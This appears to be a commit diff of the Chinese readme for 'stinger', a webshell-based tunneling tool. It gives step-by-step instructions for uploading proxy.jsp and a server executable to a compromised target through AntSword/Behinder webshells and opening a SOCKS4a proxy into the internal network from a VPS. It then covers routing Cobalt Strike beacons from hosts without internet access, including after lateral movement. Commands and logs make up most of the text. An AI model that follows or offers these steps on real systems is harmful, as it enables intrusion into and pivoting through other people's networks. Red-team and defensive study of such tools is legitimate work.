Update readme.md

FunnyWolf · Jul 20, 2020 · be85373 · be85373
1 parent 58c3150
commit be85373
Showing 1 changed file with 103 additions and 3 deletions.
diff --git a/readme.md b/readme.md
@@ -13,10 +13,10 @@
 ## SOCK4代理
 
 
-* proxy.jsp上传到目标服务器,确保 [http://example.com:8080/proxy.jsp](http://192.168.3.11:8080/proxy.jsp) 可以访问,页面返回 stinger XXX!
+* proxy.jsp上传到目标服务器,确保 [http://example.com:8080/proxy.jsp](http://example.com:8080/proxy.jsp) 可以访问,页面返回 stinger XXX!
 * 将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行```start D:/XXX/stinger_server.exe```启动服务端
 > 不要直接运行D:/XXX/stinger_server.exe,会导致tcp断连
-* vps执行```./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000```
+* vps执行```./stinger_client -w http://example.com:8080/proxy.jsp -l 0.0.0.0 -p 60000```
 * 如下输出表示成功
 ```
 root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
@@ -45,4 +45,104 @@ root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1
 2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
 ```
 * 此时已经在vps```127.0.0.1:60000```启动了一个```192.168.3.11```所在内网的**socks4a**代理
-* 此时已经将目标服务器的```127.0.0.1:60020```映射到vps
+* 此时已经将目标服务器的```127.0.0.1:60020```映射到vps的```127.0.0.1:60020```
+
+## cobalt strike单主机上线
+
+* proxy.jsp上传到目标服务器,确保 [http://example.com:8080/proxy.jsp](http://example.com:8080/proxy.jsp) 可以访问,页面返回 stinger XXX!
+* 将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行```start D:/XXX/stinger_server.exe```启动服务端
+> 不要直接运行D:/XXX/stinger_server.exe,会导致tcp断连
+* stinger_client命令行执行```./stinger_client -w http://example.com:8080/proxy.jsp -l 0.0.0.0 -p 60000```
+* 如下输出表示成功
+```
+root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
+2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
+2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
+2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
+2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
+2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
+2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
+2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
+2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
+2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
+2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
+2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
+2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
+2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
+2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
+2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
+2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
+2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
+2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
+2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
+2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
+2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
+2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
+2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
+```
+* cobalt strike添加监听,端口选择输出信息RAT Config中的Handler/LISTEN中的端口(通常为60020),beacons为127.0.0.1
+* 生成payload,上传到主机运行后即可上线
+
+## cobalt strike多主机上线
+
+* proxy.jsp上传到目标服务器,确保 [http://example.com:8080/proxy.jsp](http://example.com:8080/proxy.jsp) 可以访问,页面返回 stinger XXX!
+* 将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行```start D:/XXX/stinger_server.exe 192.168.3.11```启动服务端
+> 192.168.3.11可以改成0.0.0.0
+* stinger_client命令行执行```./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000```
+* 如下输出表示成功
+```
+root@kali:~# ./stinger_client -w http://example.com:8080:8080/proxy.jsp -l 127.0.0.1 -p 60000
+2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
+2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
+2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
+2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
+2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
+2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
+2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
+2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
+2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
+2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
+2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
+2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
+2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 192.168.3.11:60020
+2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
+2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
+2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
+2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
+2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
+2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
+2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 192.168.3.11:60020
+2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
+2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
+2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
+```
+* cobalt strike添加监听,端口选择RAT Config中的Handler/LISTEN中的端口(通常为60020),beacons为192.168.3.11
+* 生成payload,上传到主机运行后即可上线
+* 横向移动到其他主机时可以将payload指向192.168.3.11:60020即可实现出网上线
+
+
+# 相关工具
+[https://github.com/nccgroup/ABPTTS](https://github.com/nccgroup/ABPTTS)
+
+[https://github.com/sensepost/reGeorg](https://github.com/sensepost/reGeorg)
+
+[https://github.com/SECFORCE/Tunna](https://github.com/SECFORCE/Tunna)
+
+# 已测试
+## stinger_server\stinger_client
+* windows 
+* linux
+## proxy.jsp(x)/php/aspx
+* php7.2 
+* tomcat7.0 
+* iis8.0
+
+# 更新日志
+**2.0**
+更新时间: 2019-09-29
+* 将socks4代理服务移动到客户端
+* 不再支持端口转发功能
+
+**2.1**
+更新时间: 2020-01-07
+* 支持CS上线功能(即端口映射功能)